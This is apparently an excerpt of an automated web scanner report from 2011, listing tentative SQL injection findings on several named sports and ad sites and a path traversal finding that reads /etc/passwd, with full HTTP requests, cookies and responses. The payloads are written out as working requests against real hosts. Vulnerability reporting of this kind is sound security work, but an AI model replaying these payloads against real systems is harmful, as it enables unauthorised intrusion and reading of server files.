...[SNIP]...

Request 2

GET /nba'%20and%201%3d2--%20/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r2.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3520


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+39+and+1+2+news+slug+aw'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.rd.yahoo.c
...[SNIP]...

1.5. http://sports.yahoo.com/nba/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sports.yahoo.com
Path:   /nba/news

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19672091'%20or%201%3d1--%20 and 19672091'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /nba/news19672091'%20or%201%3d1--%20?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r3.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3537


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+news19672091+39+or+1+slug+aw+wojnarowski'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.
...[SNIP]...

Request 2

GET /nba/news19672091'%20or%201%3d2--%20?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3527


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+news19672091+39+or+1+2+slug+aw'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.rd.yahoo.c
...[SNIP]...

1.6. http://www.lijit.com/beacon [informer parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lijit.com
Path:   /beacon

Issue detail

The informer parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the informer parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /beacon?viewId=1307962923471503c3265a8b0&rand=1307962923471&uri=http://www.lijit.com/users/sbnation&informer=7182163%20and%201%3d1--%20&type=fpads&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rr=&ifr=0&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE

Response 1

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:15:18 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n7), ms iad-agg-n7 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 13 Jun 2011 11:15:18 GMT
Content-Length: 69
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=bc491fffd0d2d852ccd68e7be9624b6b; expires=Tue, 12-Jun-2012 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: tpro=eJxlUV1vhCAQ%2FC%2F7TAyIH6d%2Fo49NQyiikiAY0Esuxv%2FeBdO7a%2Fo2s84OM%2BsBa%2FCjsRr6AybtBh0SWmSa0KKtCYz6l5X1SUBOWcsFK3FGgCFqL3QTvEo6zgjwWlRdInVFoKZitXtMlCWPIFU2UXJX0KNajkHIJbvIaKTLaDZxzcBvc4pFcVPNxg5Bu7TtfDLsGgIPnb1phQrjlF%2ByOxWc5jGW4FQ0mXAkDRWMXqzF2PSVruTpDW%2Btvlo673Lzir%2BNsROaTEEOIqo5v1CeuBfNlnJ8HhlBDx%2BrD1sE7LRhS07brim7sjnJUzFKF82ghwIz%2F9HxpmZvukXe44JZHt%2FS2v%2Filt3Or%2Bed8PdtJp3g9ZXA4geh%2FO5wCbvcdYjG4xWBFRTO8wer25Ny; expires=Tue, 12-Jun-2012 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:15:18 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
           </body>
</html>

Request 2

GET /beacon?viewId=1307962923471503c3265a8b0&rand=1307962923471&uri=http://www.lijit.com/users/sbnation&informer=7182163%20and%201%3d2--%20&type=fpads&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rr=&ifr=0&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE

Response 2

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:15:19 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n18), ms iad-agg-n18 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 13 Jun 2011 11:15:19 GMT
Content-Length: 69
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=deleted; expires=Sun, 13-Jun-2010 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:15:19 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
           </body>
</html>

1.7. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mavsmoneyball.com
Path:   /2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:07:49 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 11:06:10 GMT
ETag: "5e0038-1efa84-4a595e82904b4"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&amp;rand=15974520"></script>



<link href="http://cdn0.sbnation.com/stylesheets/universal_screen.v5273bb74a0e39148.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/community_new_all.v75f885872ba0b098.css" media="all" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/blogs/blog-print.v777cf8a.css" media="print" rel="stylesheet" type="text/css" />

<!--[if lte IE 7]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie7-hacks.vb7d711f.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn2.sbnation.com/stylesheets/blogs/ie-hacks.v777cf8a.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if lte IE 6]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie6-hacks.vd00358f937b0dfe1.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn1.sbnation.com/stylesheets/blogs/ie6-hacks.v9e2ba1ec05749cdf.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->



<style type="text/css"><!-- body{background-image:url(http://cdn1.sbnation.com/community_logos/28080/top_fade_base.png);}.ut-logged-out ul li.start a{background-image:url(http://cdn1.sbnation.com/community_logos/1814/mavs-fave.gif);}.nav-head li a:hover{background-color:#046AB4;}.social-promo{border-color:#046AB4;}.container{background-color:#061922;}.pane h3,.entries h3.subtitle{background-color:#046AB4;border-color:#046AB4;}.nav-head-div{background-color:#023672;}.gcolumns .col-side #thumbs a:hover img{border-color:#285487;}.col-side .sports_data_widget .pane-tabs li{background-color:#2A80BF;}.events,#modal_container .sports_data_widget,.col-side .sports_data_widget,.col-side .sports_data_widget .pane-tabs li a.active,.col-side .sports_data_widget .pane-tabs li a.active:visited,.col-side .sports_data_widget .pane-tabs li a.active:hover,.col-side .sports_data_widget .pane-tabs li a.active:active{background-colo
...[SNIP]...

Request 2

GET /2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:07:50 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 11:02:12 GMT
ETag: "780110-1efa7a-4a595d9fa8b2a"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&amp;rand=61256780"></script>



<link href="http://cdn0.sbnation.com/stylesheets/universal_screen.v5273bb74a0e39148.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/community_new_all.v75f885872ba0b098.css" media="all" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/blogs/blog-print.v777cf8a.css" media="print" rel="stylesheet" type="text/css" />

<!--[if lte IE 7]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie7-hacks.vb7d711f.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn2.sbnation.com/stylesheets/blogs/ie-hacks.v777cf8a.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if lte IE 6]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie6-hacks.vd00358f937b0dfe1.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn1.sbnation.com/stylesheets/blogs/ie6-hacks.v9e2ba1ec05749cdf.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->



<style type="text/css"><!-- body{background-image:url(http://cdn1.sbnation.com/community_logos/28080/top_fade_base.png);}.ut-logged-out ul li.start a{background-image:url(http://cdn1.sbnation.com/community_logos/1814/mavs-fave.gif);}.nav-head li a:hover{background-color:#046AB4;}.social-promo{border-color:#046AB4;}.container{background-color:#061922;}.pane h3,.entries h3.subtitle{background-color:#046AB4;border-color:#046AB4;}.nav-head-div{background-color:#023672;}.gcolumns .col-side #thumbs a:hover img{border-color:#285487;}.col-side .sports_data_widget .pane-tabs li{background-color:#2A80BF;}.events,#modal_container .sports_data_widget,.col-side .sports_data_widget,.col-side .sports_data_widget .pane-tabs li a.active,.col-side .sports_data_widget .pane-tabs li a.active:visited,.col-side .sports_data_widget .pane-tabs li a.active:hover,.col-side .sports_data_widget .pane-tabs li a.active:active{background-colo
...[SNIP]...

1.8. http://www.twackle.com/fansided/General_Twackle_Widget [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.twackle.com
Path:   /fansided/General_Twackle_Widget

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fansided'/General_Twackle_Widget HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Age: 0
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:17:33 GMT
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Status: 500
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Varnish: 1493755781
Content-Length: 1735
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US">
<head>
<meta h
...[SNIP]...

Request 2

GET /fansided''/General_Twackle_Widget HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Age: 0
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:17:34 GMT
ETag: "d82f7b24bfcc87abc64d202c70fedce5"
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Status: 200
Vary: Accept-Encoding
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Runtime: 16
X-Varnish: 1493755835
Content-Length: 42
Connection: keep-alive

Sorry but this page doesn't exist anymore.

2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwd%00viewAdJs&affiliateId=1000212071&adSize=300x250 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Mon, 13 Jun 2011 11:09:34 GMT
Content-Length: 2011
Connection: close

